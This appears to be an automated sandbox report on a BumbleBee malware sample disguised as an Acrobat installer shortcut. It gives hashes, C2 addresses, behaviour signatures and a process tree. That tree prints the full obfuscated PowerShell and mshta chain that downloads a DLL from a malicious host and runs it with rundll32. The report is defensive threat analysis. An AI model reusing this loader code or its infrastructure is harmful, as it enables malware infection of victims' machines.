Overview

overview

10

Static

static

AcrobatInstaller.lnk

windows7-x64

3

AcrobatInstaller.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    137s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-12-2022 08:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AcrobatInstaller.lnk

  • Size

    1KB

  • MD5

    efc13d85b551ba2d426d3754d642ca11

  • SHA1

    43202b41ce4c2cd23cbba769227dce2f50750f27

  • SHA256

    0cd9826b702404e2f9b6854c672409422f578afd63d43795e8e370b212d403d6

  • SHA512

    3c09654c48cc9f32c240b153137750eb798cbdddc2fa7cca72ff4cac2a83563c90b9f66a13230b8af9903aa16b60b0e3a7b2bbb96ff4226cbae5962f410aff1e

Score
10/10
bumblebee1011t1trojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://cruds-club.com/AcrobatInstaller.hta

Extracted

Family

bumblebee

Botnet

1011t1

C2

64.44.135.140:443

103.144.139.150:443

146.70.149.43:443
rc4.plain

Signatures

  • BumbleBee

    BumbleBee is a webshell malware written in C++.

    trojanbumblebee
  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\AcrobatInstaller.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4780
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\?i*\S*3?\m*ta.e* ('https://cruds-club.com/AcrobatInstaller' + '.h' + 'ta')
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4928
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" https://cruds-club.com/AcrobatInstaller.hta
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1320
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function MWG($Fii, $erX){[IO.File]::WriteAllBytes($Fii, $erX)};function LaM($Fii){if($Fii.EndsWith((HQD @(6236,6290,6298,6298))) -eq $True){rundll32.exe $Fii , mruAlloc }elseif($Fii.EndsWith((HQD @(6236,6302,6305,6239))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Fii}elseif($Fii.EndsWith((HQD @(6236,6299,6305,6295))) -eq $True){misexec /qn /i $Fii}else{Start-Process $Fii}};function NRU($eMW){$QMX = New-Object (HQD @(6268,6291,6306,6236,6277,6291,6288,6257,6298,6295,6291,6300,6306));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$erX = $QMX.DownloadData($eMW);return $erX};function HQD($vfw){$ZTq=6190;$ViK=$Null;foreach($aFd in $vfw){$ViK+=[char]($aFd-$ZTq)};return $ViK};function Xxb(){$Bpm = $env:AppData + '\';;;$WbktydWSz = $Bpm + '1011t1_cr1.dll'; if (Test-Path -Path $WbktydWSz){LaM $WbktydWSz;}Else{ $jPzXrDoPH = NRU (HQD @(6294,6306,6306,6302,6305,6248,6237,6237,6289,6304,6307,6290,6305,6235,6289,6298,6307,6288,6236,6289,6301,6299,6237,6239,6238,6239,6239,6306,6239,6285,6289,6304,6239,6236,6290,6298,6298));MWG $WbktydWSz $jPzXrDoPH;LaM $WbktydWSz;};;}Xxb;
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3692
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll mruAlloc
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious use of NtCreateThreadExHideFromDebugger
            PID:2532

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    a6c9d692ed2826ecb12c09356e69cc09

    SHA1

    def728a6138cf083d8a7c61337f3c9dade41a37f

    SHA256

    a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

    SHA512

    2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

    Download Submit

  • C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll
    Filesize

    830KB

    MD5

    19f8c4fb6b729f856173beba2b8cfc1d

    SHA1

    37faae961fa1ca194a2d29a5ac4958e91f0c4c9c

    SHA256

    ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9

    SHA512

    4e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308

    Download Submit

  • C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll
    Filesize

    830KB

    MD5

    19f8c4fb6b729f856173beba2b8cfc1d

    SHA1

    37faae961fa1ca194a2d29a5ac4958e91f0c4c9c

    SHA256

    ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9

    SHA512

    4e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308

    Download Submit

  • memory/2532-146-0x00000163E0DE0000-0x00000163E0F29000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2532-147-0x00000163E0C10000-0x00000163E0C83000-memory.dmp

    Filesize

    460KB

    Download

  • memory/3692-140-0x000001C95F940000-0x000001C960401000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3692-144-0x000001C95F940000-0x000001C960401000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4928-135-0x00007FFFE1870000-0x00007FFFE2331000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4928-133-0x0000022B70CB0000-0x0000022B70CD2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4928-145-0x00007FFFE1870000-0x00007FFFE2331000-memory.dmp

    Filesize

    10.8MB

    Download